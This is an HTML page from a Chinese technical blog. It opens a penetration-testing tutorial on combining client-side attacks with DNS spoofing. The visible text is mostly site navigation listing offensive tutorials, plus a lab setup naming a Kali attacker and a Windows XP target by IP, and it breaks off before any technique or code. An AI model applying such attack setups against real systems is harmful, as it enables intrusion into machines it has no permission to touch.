<!DOCTYPE html>
<html lang="zh-CN">
  <head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width,initial-scale=1">
    <title>与DNS欺骗的结合使用 | 冰河技术</title>
    <meta name="generator" content="VuePress 1.9.7">
    <link rel="icon" href="/favicon.ico">
    <script charset="utf-8" async="async" src="/js/jquery.min.js"></script>
    <script charset="utf-8" async="async" src="/js/global.js"></script>
    <script charset="utf-8" async="async" src="/js/fingerprint2.min.js"></script>
    <script charset="utf-8" async="async" src="https://v1.cnzz.com/z_stat.php?id=1281063564&amp;web_id=1281063564"></script>
    <script charset="utf-8" async="async" src="https://s9.cnzz.com/z_stat.php?id=1281064551&amp;web_id=1281064551"></script>
    <script>
            var _hmt = _hmt || [];
            (function() {
              var hm = document.createElement("script");
              hm.src = "https://hm.baidu.com/hm.js?d091d2fd0231588b1d0f9231e24e3f5e";
              var s = document.getElementsByTagName("script")[0];
              s.parentNode.insertBefore(hm, s);
            })();
            </script>
    <meta name="description" content="包含：编程语言，开发技术，分布式，微服务，高并发，高可用，高可扩展，高可维护，JVM技术，MySQL，分布式数据库，分布式事务，云原生，大数据，云计算，渗透技术，各种面试题，面试技巧...">
    <meta property="article:modified_time" content="2022-05-23T11:30:51.000Z">
    <meta property="og:title" content="与DNS欺骗的结合使用">
    <meta property="og:type" content="article">
    <meta property="og:url" content="/md/hack/client/2022-05-02-003-%E4%B8%8EDNS%E6%AC%BA%E9%AA%97%E7%9A%84%E7%BB%93%E5%90%88%E4%BD%BF%E7%94%A8.html">
    <meta name="twitter:title" content="与DNS欺骗的结合使用">
    <meta name="twitter:url" content="/md/hack/client/2022-05-02-003-%E4%B8%8EDNS%E6%AC%BA%E9%AA%97%E7%9A%84%E7%BB%93%E5%90%88%E4%BD%BF%E7%94%A8.html">
    <meta name="twitter:card" content="summary_large_image">
    <meta name="robots" content="all">
    <meta name="author" content="冰河">
    <meta http-equiv="Cache-Control" content="no-cache, no-store, must-revalidate">
    <meta http-equiv="Pragma" content="no-cache">
    <meta http-equiv="Expires" content="0">
    <meta name="keywords" content="冰河，冰河技术, 编程语言，开发技术，分布式，微服务，高并发，高可用，高可扩展，高可维护，JVM技术，MySQL，分布式数据库，分布式事务，云原生，大数据，云计算，渗透技术，各种面试题，面试技巧">
    <meta name="apple-mobile-web-app-capable" content="yes">
    
    <link rel="preload" href="/assets/css/0.styles.ab888ebb.css" as="style"><link rel="preload" href="/assets/css/styles.css?v=1653305936337" as="style"><link rel="preload" href="/assets/js/cg-styles.js?v=1653305936337" as="script"><link rel="preload" href="/assets/js/cg-app.js?v=1653305936337" as="script"><link rel="preload" href="/assets/js/cg-4.js?v=1653305936337" as="script"><link rel="preload" href="/assets/js/cg-3.js?v=1653305936337" as="script"><link rel="preload" href="/assets/js/cg-138.js?v=1653305936337" as="script"><link rel="preload" href="/assets/js/cg-5.js?v=1653305936337" as="script"><link rel="preload" href="/assets/js/cg-6.js?v=1653305936337" as="script">
    <link rel="stylesheet" href="/assets/css/0.styles.ab888ebb.css"><link rel="stylesheet" href="/assets/css/styles.css?v=1653305936337">
  </head>
  <body>
    <div id="app" data-server-rendered="true"><div class="theme-container"><header class="navbar"><div class="sidebar-button"><svg xmlns="http://www.w3.org/2000/svg" aria-hidden="true" role="img" viewBox="0 0 448 512" class="icon"><path fill="currentColor" d="M436 124H12c-6.627 0-12-5.373-12-12V80c0-6.627 5.373-12 12-12h424c6.627 0 12 5.373 12 12v32c0 6.627-5.373 12-12 12zm0 160H12c-6.627 0-12-5.373-12-12v-32c0-6.627 5.373-12 12-12h424c6.627 0 12 5.373 12 12v32c0 6.627-5.373 12-12 12zm0 160H12c-6.627 0-12-5.373-12-12v-32c0-6.627 5.373-12 12-12h424c6.627 0 12 5.373 12 12v32c0 6.627-5.373 12-12 12z"></path></svg></div> <a href="/" class="home-link router-link-active"><!----> <span class="site-name">冰河技术</span></a> <div class="links"><div class="search-box"><input aria-label="Search" autocomplete="off" spellcheck="false" value=""> <!----></div> <nav class="nav-links can-hide"><div class="nav-item"><a href="/md/other/guide-to-reading.html" class="nav-link">
  导读
</a></div><div class="nav-item"><div class="dropdown-wrapper"><button type="button" aria-label="核心技术" class="dropdown-title"><span class="title">核心技术</span> <span class="arrow right"></span></button> <ul class="nav-dropdown" style="display:none;"><li class="dropdown-item"><h4>
          Java核心技术
        </h4> <ul class="dropdown-subitem-wrapper"><li class="dropdown-subitem"><a href="/md/core/java/basics/2022-04-28-全网最全正则表达式总结.html" class="nav-link">
  Java基础
</a></li><li class="dropdown-subitem"><a href="/md/core/java/advanced/default.html" class="nav-link">
  Java进阶
</a></li><li class="dropdown-subitem"><a href="/md/core/java/senior/default.html" class="nav-link">
  Java高级
</a></li><li class="dropdown-subitem"><a href="/md/core/java/java8/2022-03-31-001-Java8有哪些新特性呢？.html" class="nav-link">
  Java8新特性
</a></li></ul></li><li class="dropdown-item"><h4>
          Spring核心技术
        </h4> <ul class="dropdown-subitem-wrapper"><li class="dropdown-subitem"><a href="/md/core/spring/ioc/2022-04-04-001-聊聊Spring注解驱动开发那些事儿.html" class="nav-link">
  IOC核心技术
</a></li><li class="dropdown-subitem"><a href="/md/core/spring/aop/default.html" class="nav-link">
  AOP核心技术
</a></li></ul></li><li class="dropdown-item"><h4>
          JVM核心技术
        </h4> <ul class="dropdown-subitem-wrapper"><li class="dropdown-subitem"><a href="/md/core/jvm/2022-04-18-001-JVM调优的几种场景.html" class="nav-link">
  JVM调优技术
</a></li></ul></li></ul></div></div><div class="nav-item"><div class="dropdown-wrapper"><button type="button" aria-label="性能调优" class="dropdown-title"><span class="title">性能调优</span> <span class="arrow right"></span></button> <ul class="nav-dropdown" style="display:none;"><li class="dropdown-item"><!----> <a href="/md/performance/jvm/default.html" class="nav-link">
  JVM性能调优
</a></li><li class="dropdown-item"><!----> <a href="/md/performance/tomcat/default.html" class="nav-link">
  Tomcat性能调优
</a></li><li class="dropdown-item"><!----> <a href="/md/performance/mysql/default.html" class="nav-link">
  MySQL性能调优
</a></li><li class="dropdown-item"><!----> <a href="/md/performance/system/default.html" class="nav-link">
  操作系统性能调优
</a></li></ul></div></div><div class="nav-item"><div class="dropdown-wrapper"><button type="button" aria-label="并发编程" class="dropdown-title"><span class="title">并发编程</span> <span class="arrow right"></span></button> <ul class="nav-dropdown" style="display:none;"><li class="dropdown-item"><!----> <a href="/md/concurrent/bottom/default.html" class="nav-link">
  底层技术
</a></li><li class="dropdown-item"><!----> <a href="/md/concurrent/source/2020-03-30-001-一文搞懂线程与多线程.html" class="nav-link">
  源码分析
</a></li><li class="dropdown-item"><!----> <a href="/md/concurrent/basics/2020-03-30-001-明明中断了线程，却为何不起作用呢？.html" class="nav-link">
  基础案例
</a></li><li class="dropdown-item"><!----> <a href="/md/concurrent/ActualCombat/default.html" class="nav-link">
  实战案例
</a></li><li class="dropdown-item"><!----> <a href="/md/concurrent/interview/default.html" class="nav-link">
  面试
</a></li><li class="dropdown-item"><!----> <a href="/md/concurrent/framework/default.html" class="nav-link">
  系统架构
</a></li></ul></div></div><div class="nav-item"><div class="dropdown-wrapper"><button type="button" aria-label="框架源码" class="dropdown-title"><span class="title">框架源码</span> <span class="arrow right"></span></button> <ul class="nav-dropdown" style="display:none;"><li class="dropdown-item"><!----> <a href="/md/frame/spring/default.html" class="nav-link">
  Spring源码
</a></li><li class="dropdown-item"><!----> <a href="/md/frame/springmvc/default.html" class="nav-link">
  SpringMVC源码
</a></li><li class="dropdown-item"><!----> <a href="/md/frame/mybatis/default.html" class="nav-link">
  MyBatis源码
</a></li><li class="dropdown-item"><!----> <a href="/md/frame/dubbo/default.html" class="nav-link">
  Dubbo源码
</a></li></ul></div></div><div class="nav-item"><div class="dropdown-wrapper"><button type="button" aria-label="分布式" class="dropdown-title"><span class="title">分布式</span> <span class="arrow right"></span></button> <ul class="nav-dropdown" style="display:none;"><li class="dropdown-item"><h4>
          缓存技术
        </h4> <ul class="dropdown-subitem-wrapper"><li class="dropdown-subitem"><a href="/md/distributed/cache/default.html" class="nav-link">
  Redis
</a></li></ul></li><li class="dropdown-item"><h4>
          服务注册发现
        </h4> <ul class="dropdown-subitem-wrapper"><li class="dropdown-subitem"><a href="/md/distributed/zookeeper/default.html" class="nav-link">
  Zookeeper
</a></li></ul></li><li class="dropdown-item"><h4>
          消息中间件
        </h4> <ul class="dropdown-subitem-wrapper"><li class="dropdown-subitem"><a href="/md/distributed/mq/rabbitmq/default.html" class="nav-link">
  RabbitMQ
</a></li><li class="dropdown-subitem"><a href="/md/distributed/mq/rocketmq/default.html" class="nav-link">
  RocketMQ
</a></li><li class="dropdown-subitem"><a href="/md/distributed/mq/kafka/default.html" class="nav-link">
  Kafka
</a></li></ul></li><li class="dropdown-item"><h4>
          网络通信
        </h4> <ul class="dropdown-subitem-wrapper"><li class="dropdown-subitem"><a href="/md/distributed/netty/default.html" class="nav-link">
  Netty
</a></li></ul></li><li class="dropdown-item"><h4>
          远程调用
        </h4> <ul class="dropdown-subitem-wrapper"><li class="dropdown-subitem"><a href="/md/distributed/dubbo/default.html" class="nav-link">
  Dubbo
</a></li></ul></li><li class="dropdown-item"><h4>
          数据库
        </h4> <ul class="dropdown-subitem-wrapper"><li class="dropdown-subitem"><a href="/md/distributed/mongodb/default.html" class="nav-link">
  MongoDB
</a></li></ul></li><li class="dropdown-item"><h4>
          搜索引擎
        </h4> <ul class="dropdown-subitem-wrapper"><li class="dropdown-subitem"><a href="/md/distributed/es/default.html" class="nav-link">
  ElasticSearch
</a></li></ul></li></ul></div></div><div class="nav-item"><div class="dropdown-wrapper"><button type="button" aria-label="微服务" class="dropdown-title"><span class="title">微服务</span> <span class="arrow right"></span></button> <ul class="nav-dropdown" style="display:none;"><li class="dropdown-item"><!----> <a href="/md/microservices/springboot/default.html" class="nav-link">
  SpringBoot
</a></li><li class="dropdown-item"><!----> <a href="/md/microservices/springcloudalibaba/2022-04-02-SpringCloudAlibaba专栏开篇.html" class="nav-link">
  SpringCloudAlibaba
</a></li></ul></div></div><div class="nav-item"><div class="dropdown-wrapper"><button type="button" aria-label="中间件" class="dropdown-title"><span class="title">中间件</span> <span class="arrow right"></span></button> <ul class="nav-dropdown" style="display:none;"><li class="dropdown-item"><!----> <a href="/md/middleware/bytecode/2022-04-11-001-工作多年的你依然重复做着CRUD-是否接触过这种技术.html" class="nav-link">
  字节码编程
</a></li><li class="dropdown-item"><!----> <a href="/md/middleware/threadpool/default.html" class="nav-link">
  手写线程池
</a></li><li class="dropdown-item"><!----> <a href="/md/middleware/limiter/default.html" class="nav-link">
  分布式限流
</a></li><li class="dropdown-item"><!----> <a href="/md/middleware/independent/default.html" class="nav-link">
  开源项目
</a></li></ul></div></div><div class="nav-item"><div class="dropdown-wrapper"><button type="button" aria-label="项目实战" class="dropdown-title"><span class="title">项目实战</span> <span class="arrow right"></span></button> <ul class="nav-dropdown" style="display:none;"><li class="dropdown-item"><!----> <a href="/md/microservices/springcloudalibaba/2022-04-02-SpringCloudAlibaba专栏开篇.html" class="nav-link">
  SpringCloud Alibaba实战
</a></li></ul></div></div><div class="nav-item"><div class="dropdown-wrapper"><button type="button" aria-label="渗透技术" class="dropdown-title"><span class="title">渗透技术</span> <span class="arrow right"></span></button> <ul class="nav-dropdown" style="display:none;"><li class="dropdown-item"><!----> <a href="/md/hack/environment/2022-04-17-001-安装Kali系统.html" class="nav-link">
  基础环境篇
</a></li><li class="dropdown-item"><!----> <a href="/md/hack/tools/2022-04-17-001-使用Easy-Creds工具攻击无线网络.html" class="nav-link">
  渗透工具篇
</a></li><li class="dropdown-item"><!----> <a href="/md/hack/horse/2022-05-02-001-各种一句话木马大全.html" class="nav-link">
  木马篇
</a></li><li class="dropdown-item"><!----> <a href="/md/hack/sql/2022-05-02-001-sqli-labs-master下载与安装.html" class="nav-link">
  SQL注入篇
</a></li><li class="dropdown-item"><!----> <a href="/md/hack/shell/2022-05-02-001-各种解析漏洞拿shell.html" class="nav-link">
  漏洞拿Shell篇
</a></li><li class="dropdown-item"><!----> <a href="/md/hack/crack/2022-05-02-001-使用rarcrack暴力破解RAR-ZIP-7Z压缩包.html" class="nav-link">
  暴力破解篇
</a></li><li class="dropdown-item"><!----> <a href="/md/hack/bash/2022-05-02-001-3389脚本开启代码(vbs版).html" class="nav-link">
  渗透脚本篇
</a></li><li class="dropdown-item"><!----> <a href="/md/hack/raising/2022-05-02-001-数据库提权.html" class="nav-link">
  数据与系统提权篇
</a></li><li class="dropdown-item"><!----> <a href="/md/hack/client/2022-05-02-001-浏览器渗透.html" class="nav-link">
  客户端渗透篇
</a></li><li class="dropdown-item"><!----> <a href="/md/hack/sociology/2022-05-02-001-Metasploit之社会工程学工具包.html" class="nav-link">
  社会工程学
</a></li><li class="dropdown-item"><!----> <a href="/md/hack/question/2022-05-02-001-HTTP错误4031禁止访问-执行访问被拒绝.html" class="nav-link">
  问题记录篇
</a></li></ul></div></div><div class="nav-item"><a href="/md/interview/2022-04-18-001-面试必问-聊聊JVM性能调优.html" class="nav-link">
  面试必问系列
</a></div><div class="nav-item"><div class="dropdown-wrapper"><button type="button" aria-label="📚PDF" class="dropdown-title"><span class="title">📚PDF</span> <span class="arrow right"></span></button> <ul class="nav-dropdown" style="display:none;"><li class="dropdown-item"><h4>
          出版图书
        </h4> <ul class="dropdown-subitem-wrapper"><li class="dropdown-subitem"><a href="/md/knowledge/book/2022-03-29-深入理解分布式事务.html" class="nav-link">
  《深入理解分布式事务：原理与实战》
</a></li><li class="dropdown-subitem"><a href="/md/knowledge/book/2022-03-29-MySQL技术大全.html" class="nav-link">
  《MySQL技术大全：开发、优化与运维实战》
</a></li><li class="dropdown-subitem"><a href="/md/knowledge/book/2022-03-29-海量数据处理与大数据技术实战.html" class="nav-link">
  《海量数据处理与大数据技术实战》
</a></li></ul></li><li class="dropdown-item"><h4>
          电子书籍
        </h4> <ul class="dropdown-subitem-wrapper"><li class="dropdown-subitem"><a href="/md/knowledge/pdf/2022-03-30-《冰河的渗透实战笔记》电子书，442页，37万字，正式发布.html" class="nav-link">
  冰河的渗透实战笔记
</a></li></ul></li></ul></div></div><div class="nav-item"><div class="dropdown-wrapper"><button type="button" aria-label="关于" class="dropdown-title"><span class="title">关于</span> <span class="arrow right"></span></button> <ul class="nav-dropdown" style="display:none;"><li class="dropdown-item"><!----> <a href="/md/about/me/about-me.html" class="nav-link">
  关于自己
</a></li><li class="dropdown-item"><!----> <a href="/md/about/study/default.html" class="nav-link">
  关于学习
</a></li><li class="dropdown-item"><!----> <a href="/md/about/job/default.html" class="nav-link">
  关于职场
</a></li></ul></div></div><div class="nav-item"><a href="https://space.bilibili.com/517638832" target="_blank" rel="noopener noreferrer" class="nav-link external">
  B站
  <span><svg xmlns="http://www.w3.org/2000/svg" aria-hidden="true" focusable="false" x="0px" y="0px" viewBox="0 0 100 100" width="15" height="15" class="icon outbound"><path fill="currentColor" d="M18.8,85.1h56l0,0c2.2,0,4-1.8,4-4v-32h-8v28h-48v-48h28v-8h-32l0,0c-2.2,0-4,1.8-4,4v56C14.8,83.3,16.6,85.1,18.8,85.1z"></path> <polygon fill="currentColor" points="45.7,48.7 51.3,54.3 77.2,28.5 77.2,37.2 85.2,37.2 85.2,14.9 62.8,14.9 62.8,22.9 71.5,22.9"></polygon></svg> <span class="sr-only">(opens new window)</span></span></a></div><div class="nav-item"><a href="https://github.com/binghe001/BingheGuide" target="_blank" rel="noopener noreferrer" class="nav-link external">
  Github
  <span><svg xmlns="http://www.w3.org/2000/svg" aria-hidden="true" focusable="false" x="0px" y="0px" viewBox="0 0 100 100" width="15" height="15" class="icon outbound"><path fill="currentColor" d="M18.8,85.1h56l0,0c2.2,0,4-1.8,4-4v-32h-8v28h-48v-48h28v-8h-32l0,0c-2.2,0-4,1.8-4,4v56C14.8,83.3,16.6,85.1,18.8,85.1z"></path> <polygon fill="currentColor" points="45.7,48.7 51.3,54.3 77.2,28.5 77.2,37.2 85.2,37.2 85.2,14.9 62.8,14.9 62.8,22.9 71.5,22.9"></polygon></svg> <span class="sr-only">(opens new window)</span></span></a></div> <!----></nav></div></header> <div class="sidebar-mask"></div> <aside class="sidebar"><nav class="nav-links"><div class="nav-item"><a href="/md/other/guide-to-reading.html" class="nav-link">
  导读
</a></div><div class="nav-item"><div class="dropdown-wrapper"><button type="button" aria-label="核心技术" class="dropdown-title"><span class="title">核心技术</span> <span class="arrow right"></span></button> <ul class="nav-dropdown" style="display:none;"><li class="dropdown-item"><h4>
          Java核心技术
        </h4> <ul class="dropdown-subitem-wrapper"><li class="dropdown-subitem"><a href="/md/core/java/basics/2022-04-28-全网最全正则表达式总结.html" class="nav-link">
  Java基础
</a></li><li class="dropdown-subitem"><a href="/md/core/java/advanced/default.html" class="nav-link">
  Java进阶
</a></li><li class="dropdown-subitem"><a href="/md/core/java/senior/default.html" class="nav-link">
  Java高级
</a></li><li class="dropdown-subitem"><a href="/md/core/java/java8/2022-03-31-001-Java8有哪些新特性呢？.html" class="nav-link">
  Java8新特性
</a></li></ul></li><li class="dropdown-item"><h4>
          Spring核心技术
        </h4> <ul class="dropdown-subitem-wrapper"><li class="dropdown-subitem"><a href="/md/core/spring/ioc/2022-04-04-001-聊聊Spring注解驱动开发那些事儿.html" class="nav-link">
  IOC核心技术
</a></li><li class="dropdown-subitem"><a href="/md/core/spring/aop/default.html" class="nav-link">
  AOP核心技术
</a></li></ul></li><li class="dropdown-item"><h4>
          JVM核心技术
        </h4> <ul class="dropdown-subitem-wrapper"><li class="dropdown-subitem"><a href="/md/core/jvm/2022-04-18-001-JVM调优的几种场景.html" class="nav-link">
  JVM调优技术
</a></li></ul></li></ul></div></div><div class="nav-item"><div class="dropdown-wrapper"><button type="button" aria-label="性能调优" class="dropdown-title"><span class="title">性能调优</span> <span class="arrow right"></span></button> <ul class="nav-dropdown" style="display:none;"><li class="dropdown-item"><!----> <a href="/md/performance/jvm/default.html" class="nav-link">
  JVM性能调优
</a></li><li class="dropdown-item"><!----> <a href="/md/performance/tomcat/default.html" class="nav-link">
  Tomcat性能调优
</a></li><li class="dropdown-item"><!----> <a href="/md/performance/mysql/default.html" class="nav-link">
  MySQL性能调优
</a></li><li class="dropdown-item"><!----> <a href="/md/performance/system/default.html" class="nav-link">
  操作系统性能调优
</a></li></ul></div></div><div class="nav-item"><div class="dropdown-wrapper"><button type="button" aria-label="并发编程" class="dropdown-title"><span class="title">并发编程</span> <span class="arrow right"></span></button> <ul class="nav-dropdown" style="display:none;"><li class="dropdown-item"><!----> <a href="/md/concurrent/bottom/default.html" class="nav-link">
  底层技术
</a></li><li class="dropdown-item"><!----> <a href="/md/concurrent/source/2020-03-30-001-一文搞懂线程与多线程.html" class="nav-link">
  源码分析
</a></li><li class="dropdown-item"><!----> <a href="/md/concurrent/basics/2020-03-30-001-明明中断了线程，却为何不起作用呢？.html" class="nav-link">
  基础案例
</a></li><li class="dropdown-item"><!----> <a href="/md/concurrent/ActualCombat/default.html" class="nav-link">
  实战案例
</a></li><li class="dropdown-item"><!----> <a href="/md/concurrent/interview/default.html" class="nav-link">
  面试
</a></li><li class="dropdown-item"><!----> <a href="/md/concurrent/framework/default.html" class="nav-link">
  系统架构
</a></li></ul></div></div><div class="nav-item"><div class="dropdown-wrapper"><button type="button" aria-label="框架源码" class="dropdown-title"><span class="title">框架源码</span> <span class="arrow right"></span></button> <ul class="nav-dropdown" style="display:none;"><li class="dropdown-item"><!----> <a href="/md/frame/spring/default.html" class="nav-link">
  Spring源码
</a></li><li class="dropdown-item"><!----> <a href="/md/frame/springmvc/default.html" class="nav-link">
  SpringMVC源码
</a></li><li class="dropdown-item"><!----> <a href="/md/frame/mybatis/default.html" class="nav-link">
  MyBatis源码
</a></li><li class="dropdown-item"><!----> <a href="/md/frame/dubbo/default.html" class="nav-link">
  Dubbo源码
</a></li></ul></div></div><div class="nav-item"><div class="dropdown-wrapper"><button type="button" aria-label="分布式" class="dropdown-title"><span class="title">分布式</span> <span class="arrow right"></span></button> <ul class="nav-dropdown" style="display:none;"><li class="dropdown-item"><h4>
          缓存技术
        </h4> <ul class="dropdown-subitem-wrapper"><li class="dropdown-subitem"><a href="/md/distributed/cache/default.html" class="nav-link">
  Redis
</a></li></ul></li><li class="dropdown-item"><h4>
          服务注册发现
        </h4> <ul class="dropdown-subitem-wrapper"><li class="dropdown-subitem"><a href="/md/distributed/zookeeper/default.html" class="nav-link">
  Zookeeper
</a></li></ul></li><li class="dropdown-item"><h4>
          消息中间件
        </h4> <ul class="dropdown-subitem-wrapper"><li class="dropdown-subitem"><a href="/md/distributed/mq/rabbitmq/default.html" class="nav-link">
  RabbitMQ
</a></li><li class="dropdown-subitem"><a href="/md/distributed/mq/rocketmq/default.html" class="nav-link">
  RocketMQ
</a></li><li class="dropdown-subitem"><a href="/md/distributed/mq/kafka/default.html" class="nav-link">
  Kafka
</a></li></ul></li><li class="dropdown-item"><h4>
          网络通信
        </h4> <ul class="dropdown-subitem-wrapper"><li class="dropdown-subitem"><a href="/md/distributed/netty/default.html" class="nav-link">
  Netty
</a></li></ul></li><li class="dropdown-item"><h4>
          远程调用
        </h4> <ul class="dropdown-subitem-wrapper"><li class="dropdown-subitem"><a href="/md/distributed/dubbo/default.html" class="nav-link">
  Dubbo
</a></li></ul></li><li class="dropdown-item"><h4>
          数据库
        </h4> <ul class="dropdown-subitem-wrapper"><li class="dropdown-subitem"><a href="/md/distributed/mongodb/default.html" class="nav-link">
  MongoDB
</a></li></ul></li><li class="dropdown-item"><h4>
          搜索引擎
        </h4> <ul class="dropdown-subitem-wrapper"><li class="dropdown-subitem"><a href="/md/distributed/es/default.html" class="nav-link">
  ElasticSearch
</a></li></ul></li></ul></div></div><div class="nav-item"><div class="dropdown-wrapper"><button type="button" aria-label="微服务" class="dropdown-title"><span class="title">微服务</span> <span class="arrow right"></span></button> <ul class="nav-dropdown" style="display:none;"><li class="dropdown-item"><!----> <a href="/md/microservices/springboot/default.html" class="nav-link">
  SpringBoot
</a></li><li class="dropdown-item"><!----> <a href="/md/microservices/springcloudalibaba/2022-04-02-SpringCloudAlibaba专栏开篇.html" class="nav-link">
  SpringCloudAlibaba
</a></li></ul></div></div><div class="nav-item"><div class="dropdown-wrapper"><button type="button" aria-label="中间件" class="dropdown-title"><span class="title">中间件</span> <span class="arrow right"></span></button> <ul class="nav-dropdown" style="display:none;"><li class="dropdown-item"><!----> <a href="/md/middleware/bytecode/2022-04-11-001-工作多年的你依然重复做着CRUD-是否接触过这种技术.html" class="nav-link">
  字节码编程
</a></li><li class="dropdown-item"><!----> <a href="/md/middleware/threadpool/default.html" class="nav-link">
  手写线程池
</a></li><li class="dropdown-item"><!----> <a href="/md/middleware/limiter/default.html" class="nav-link">
  分布式限流
</a></li><li class="dropdown-item"><!----> <a href="/md/middleware/independent/default.html" class="nav-link">
  开源项目
</a></li></ul></div></div><div class="nav-item"><div class="dropdown-wrapper"><button type="button" aria-label="项目实战" class="dropdown-title"><span class="title">项目实战</span> <span class="arrow right"></span></button> <ul class="nav-dropdown" style="display:none;"><li class="dropdown-item"><!----> <a href="/md/microservices/springcloudalibaba/2022-04-02-SpringCloudAlibaba专栏开篇.html" class="nav-link">
  SpringCloud Alibaba实战
</a></li></ul></div></div><div class="nav-item"><div class="dropdown-wrapper"><button type="button" aria-label="渗透技术" class="dropdown-title"><span class="title">渗透技术</span> <span class="arrow right"></span></button> <ul class="nav-dropdown" style="display:none;"><li class="dropdown-item"><!----> <a href="/md/hack/environment/2022-04-17-001-安装Kali系统.html" class="nav-link">
  基础环境篇
</a></li><li class="dropdown-item"><!----> <a href="/md/hack/tools/2022-04-17-001-使用Easy-Creds工具攻击无线网络.html" class="nav-link">
  渗透工具篇
</a></li><li class="dropdown-item"><!----> <a href="/md/hack/horse/2022-05-02-001-各种一句话木马大全.html" class="nav-link">
  木马篇
</a></li><li class="dropdown-item"><!----> <a href="/md/hack/sql/2022-05-02-001-sqli-labs-master下载与安装.html" class="nav-link">
  SQL注入篇
</a></li><li class="dropdown-item"><!----> <a href="/md/hack/shell/2022-05-02-001-各种解析漏洞拿shell.html" class="nav-link">
  漏洞拿Shell篇
</a></li><li class="dropdown-item"><!----> <a href="/md/hack/crack/2022-05-02-001-使用rarcrack暴力破解RAR-ZIP-7Z压缩包.html" class="nav-link">
  暴力破解篇
</a></li><li class="dropdown-item"><!----> <a href="/md/hack/bash/2022-05-02-001-3389脚本开启代码(vbs版).html" class="nav-link">
  渗透脚本篇
</a></li><li class="dropdown-item"><!----> <a href="/md/hack/raising/2022-05-02-001-数据库提权.html" class="nav-link">
  数据与系统提权篇
</a></li><li class="dropdown-item"><!----> <a href="/md/hack/client/2022-05-02-001-浏览器渗透.html" class="nav-link">
  客户端渗透篇
</a></li><li class="dropdown-item"><!----> <a href="/md/hack/sociology/2022-05-02-001-Metasploit之社会工程学工具包.html" class="nav-link">
  社会工程学
</a></li><li class="dropdown-item"><!----> <a href="/md/hack/question/2022-05-02-001-HTTP错误4031禁止访问-执行访问被拒绝.html" class="nav-link">
  问题记录篇
</a></li></ul></div></div><div class="nav-item"><a href="/md/interview/2022-04-18-001-面试必问-聊聊JVM性能调优.html" class="nav-link">
  面试必问系列
</a></div><div class="nav-item"><div class="dropdown-wrapper"><button type="button" aria-label="📚PDF" class="dropdown-title"><span class="title">📚PDF</span> <span class="arrow right"></span></button> <ul class="nav-dropdown" style="display:none;"><li class="dropdown-item"><h4>
          出版图书
        </h4> <ul class="dropdown-subitem-wrapper"><li class="dropdown-subitem"><a href="/md/knowledge/book/2022-03-29-深入理解分布式事务.html" class="nav-link">
  《深入理解分布式事务：原理与实战》
</a></li><li class="dropdown-subitem"><a href="/md/knowledge/book/2022-03-29-MySQL技术大全.html" class="nav-link">
  《MySQL技术大全：开发、优化与运维实战》
</a></li><li class="dropdown-subitem"><a href="/md/knowledge/book/2022-03-29-海量数据处理与大数据技术实战.html" class="nav-link">
  《海量数据处理与大数据技术实战》
</a></li></ul></li><li class="dropdown-item"><h4>
          电子书籍
        </h4> <ul class="dropdown-subitem-wrapper"><li class="dropdown-subitem"><a href="/md/knowledge/pdf/2022-03-30-《冰河的渗透实战笔记》电子书，442页，37万字，正式发布.html" class="nav-link">
  冰河的渗透实战笔记
</a></li></ul></li></ul></div></div><div class="nav-item"><div class="dropdown-wrapper"><button type="button" aria-label="关于" class="dropdown-title"><span class="title">关于</span> <span class="arrow right"></span></button> <ul class="nav-dropdown" style="display:none;"><li class="dropdown-item"><!----> <a href="/md/about/me/about-me.html" class="nav-link">
  关于自己
</a></li><li class="dropdown-item"><!----> <a href="/md/about/study/default.html" class="nav-link">
  关于学习
</a></li><li class="dropdown-item"><!----> <a href="/md/about/job/default.html" class="nav-link">
  关于职场
</a></li></ul></div></div><div class="nav-item"><a href="https://space.bilibili.com/517638832" target="_blank" rel="noopener noreferrer" class="nav-link external">
  B站
  <span><svg xmlns="http://www.w3.org/2000/svg" aria-hidden="true" focusable="false" x="0px" y="0px" viewBox="0 0 100 100" width="15" height="15" class="icon outbound"><path fill="currentColor" d="M18.8,85.1h56l0,0c2.2,0,4-1.8,4-4v-32h-8v28h-48v-48h28v-8h-32l0,0c-2.2,0-4,1.8-4,4v56C14.8,83.3,16.6,85.1,18.8,85.1z"></path> <polygon fill="currentColor" points="45.7,48.7 51.3,54.3 77.2,28.5 77.2,37.2 85.2,37.2 85.2,14.9 62.8,14.9 62.8,22.9 71.5,22.9"></polygon></svg> <span class="sr-only">(opens new window)</span></span></a></div><div class="nav-item"><a href="https://github.com/binghe001/BingheGuide" target="_blank" rel="noopener noreferrer" class="nav-link external">
  Github
  <span><svg xmlns="http://www.w3.org/2000/svg" aria-hidden="true" focusable="false" x="0px" y="0px" viewBox="0 0 100 100" width="15" height="15" class="icon outbound"><path fill="currentColor" d="M18.8,85.1h56l0,0c2.2,0,4-1.8,4-4v-32h-8v28h-48v-48h28v-8h-32l0,0c-2.2,0-4,1.8-4,4v56C14.8,83.3,16.6,85.1,18.8,85.1z"></path> <polygon fill="currentColor" points="45.7,48.7 51.3,54.3 77.2,28.5 77.2,37.2 85.2,37.2 85.2,14.9 62.8,14.9 62.8,22.9 71.5,22.9"></polygon></svg> <span class="sr-only">(opens new window)</span></span></a></div> <!----></nav>  <ul class="sidebar-links"><li><section class="sidebar-group depth-0"><p class="sidebar-heading open"><span>客户端渗透篇</span> <!----></p> <ul class="sidebar-links sidebar-group-items"><li><a href="/md/hack/client/2022-05-02-001-浏览器渗透.html" class="sidebar-link">浏览器渗透</a></li><li><a href="/md/hack/client/2022-05-02-002-对网站的客户进行渗透.html" class="sidebar-link">对网站的客户进行渗透</a></li><li><a href="/md/hack/client/2022-05-02-003-与DNS欺骗的结合使用.html" class="active sidebar-link">与DNS欺骗的结合使用</a></li><li><a href="/md/hack/client/2022-05-02-004-基于PDF文件格式的渗透攻击.html" class="sidebar-link">基于PDF文件格式的渗透攻击</a></li><li><a href="/md/hack/client/2022-05-02-005-基于Word文件格式的渗透攻击.html" class="sidebar-link">基于Word文件格式的渗透攻击</a></li><li><a href="/md/hack/client/2022-05-02-006-使用Metasploit实现对Linux客户端的渗透.html" class="sidebar-link">使用Metasploit实现对Linux客户端的渗透</a></li><li><a href="/md/hack/client/2022-05-02-007-使用Metasploit渗透Android系统.html" class="sidebar-link">使用Metasploit渗透Android系统</a></li></ul></section></li></ul> </aside> <div><main class="page"> <div class="theme-default-content content__default"><h1 id="与dns欺骗的结合使用"><a href="#与dns欺骗的结合使用" class="header-anchor">#</a> 与DNS欺骗的结合使用</h1> <p>攻击机 Kali 192.168.175.128</p> <p>靶机 WinXP 192.168.175.130</p> <p>在《<a href="https://blog.csdn.net/l1028386804/article/details/86632106" target="_blank" 